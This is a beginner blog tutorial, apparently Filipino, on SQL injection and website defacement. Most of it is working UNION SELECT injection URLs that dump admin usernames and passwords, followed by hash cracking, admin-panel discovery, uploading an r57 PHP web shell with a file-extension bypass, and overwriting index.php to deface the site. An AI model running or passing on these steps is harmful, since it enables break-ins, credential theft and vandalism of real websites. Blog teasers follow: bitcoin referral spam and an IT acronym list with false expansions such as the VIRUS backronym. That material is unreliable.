Lumaktaw sa pangunahing content

Sqli and Defacement


SQL Injection And Defacement For Beginners Complete Tutorial

1. First you need to find vulnerable website.

http://sql-vuln-site.com/index.php?id=15

2. Now you need to find columns.

http://sql-vuln-site.com/index.php?id=15 order by 1-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 2-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 3-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 4-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 5-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 6-- ( error )

Error’s looks like this:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’39′ at line 1
database query failure- SELECT * FROM texecom_sidemenu WHERE id=’39

3. Now Select columns
Columns is 5

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT 1,2,3,4,5–

4. Finding version.
So if you not go the bold number 1 , 2, 3 , 4 one of them you will try all.
I choose 1

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT @@version,2,3,4,5–

you got the version like this:
5.0.32-Debian_7etch11-log

5. Finding Tables
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT table_name,2,3,4,5 from information_schema.tables–
And you will got tables like this:
PRODUCTS , ADMINS , and others
So must be there table by name: admin , users , user , login , client.

6. Finding Columns in the Table ADMINS.

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char()–

We found ADMINS table now go to ASCII web and convert ADMINS
You will got this ADMINS
Remove &# and replace ; to ,
Like this: 65,68,77,73,78,83
You put table_name=char(65,68,77,73,78,83)–

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char(65,68,77,73,78,83)–

And you will got the columns in table ADMINS
There need to have columns with names: username and password

7. Getting username and password.

Now we put concat(username,0x3a,password) and admins

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT concat(username,0x3a,password),2,3,4,5 from admins–

( 0x3a is ASCII )
8. Finded username and password
So you found the username and password
if the password is hash like this: 2510c39011c5be704182423e3a695e91
you will need to use MD5 Hash Online Crackers.
If password is not hash you are lucky and now you need to find admin panel.

9. Finding Admin Panel

Open the tool Admin Finder
Put the website in the bellow and click Scan.
So you found admin panel and it looks like this http://sql-vuln-site.com/admin/login.php

You open website and there have Username: Password:
Put username and password what you got.
Done you login in Admin Panel lets upload shell and deface.

10. Uploading Shell and Add Deface

In Admin Panel you will search categories or anything where you can upload a file or picture.
When you found, you will download shell from the website who i tell you before start tutorial so you will try to upload your shell like: r57.php when you upload it you will see the link of the upload and open it like this:

http://sql-vuln-site.com/upload/r57.php

If can’t upload r57.php change it to r57.jpg.php or r57.txt and try!

You need to make a deface page in html and put in the website
So you open the shell,you will found a file index.php and click on it and there you will remove the php code from index and put your html code.

Congratulations you deface the website.

Mga Komento

Mga sikat na post sa blog na ito

EARN BITCOIN

MALAKI NA HALAGA NG BITCOIN SA PHP KAYA EARN NA :) 1 BITCOIN = 500,000+Php HEY BTC AND SATOSHI EARNERS! HERE IS MY MOST TRUSTED, LEGIT SITE'S AND APP'S  TO EARN. 3 APP's FOR EARNING BITCOIN FREE 1,000 SATOSHI IF YOU USE MY CODE ' 2DVRYJ' >  https://play.google.com/store/apps/details?id=com.claimbitcoinnetwork.sst >  https://play.google.com/store/apps/details?id=com.claimbitcoinnetwork.wos >  https://play.google.com/store/apps/details?id=tech.jplabs.bitcoin EARN LOAD USING MESSENGER > m.me/neargroup?ref=R_II6ig1 FREE 300PHP UPON SIGN UP > https://affiliate.paysbook.co/auth/register?id=Mryosojmlf EARN BITCOIN,LITECOIN,DOGECOIN,DASH COIN MAIN SITE:  coinpot.co FAUCET SITE'S: > http://moonbit.co.in/?ref=8e315d2026b4 (BITCOIN) > http://moondoge.co.in/?ref=7d9dbc153226 (DOGECOIN) > http://moonliteco.in/?ref=7b7bb9509913 (LITECOIN) > http://moondash.co.in/?ref=87DACF2841DD (DASH) > http://moonb.ch/?ref=62497...

Common I.T Terms have Meanings

•VIRUS - Vital InformationReso urce UnderSeized. •3G -3rd Generation. •GSM - Global System forMobile Communication. •CDMA - Code DivisonMultiple  Access. • UMTS - UniversalMobile Telec­ommunicat ionSystem. • SIM - Subscriber IdentityModule .  •AVI = Audio Video Interleave •RTS = Real Time Streaming • SIS = Symbian OS InstallerFile • AMR = Adaptive Multi-RateCodec • JAD = Java ApplicationDesc ripto­r •JAR = Java Archive • 3GPP = 3rd GenerationPartn ershi­p Project • 3GP = 3rd Generation Project • MP3 = MPEG player lll • MP4 = MPEG-4 video file • AAC = Advanced Audio Coding • GIF= Graphic Interchangeable Forma­t • JPEG = Joint PhotographicExp ert Group • BMP = Bitmap • SWF = Shock Wave Flash • WMV = Windows MediaVideo • WMA = Windows MediaAudio • WAV = Waveform Audio • PNG = Portable NetworkGraphics • DOC = Document(Micros oftCo­rporation ) • PDF = Portable DocumentFormat • M3G = Mobile 3D Graphics • M4A = MPEG-4 Audio File • NTH = Nokia Theme (series40) • THM = Themes (Son...

TIPS para maiwasan mahack ang Facebook o Ang Email (FACEBOOK HACKING)

TIPS para maiwasan mahack ang facebook/email.. By The Way, It's Tagalog Time Because Some of my Reader's requests is Tagalog daw kung Maari dahil Mas Mauunawaan at Maiintindihan Nila ng husto. Anyway may mga ibat ibang klase ng fb hacking like hack via 3 friends, phishing, hijacking/sniffing, bruteforce, social engineering, cookie stealing etc... ◇◇TIPS◇◇ •Iwasan ang mag login sa pekeng facebook page or "phishing" kung tawagin. pano malalaman kung phishing? tignan ang address bar. ang fb ay may address na "www.facebook.com" o kaya'y "free.facebook.com" at samantalang ang phishing ay iba iba ang address. at pag may nakita kang facebook login at hindi facebook.com ang nakalagay! wag mo na ituloy, Dahil pag naglogin ka sa pekeng facebook na yun, maaaring makuwa ang data na nilagay mo ang user at password Makukuwa nila un sa server or email ng phisherman. •×Wag ibibigay Ang Email mo Katulad ng HAHAHAHAHA@gmail.com, kasi yan po ang p...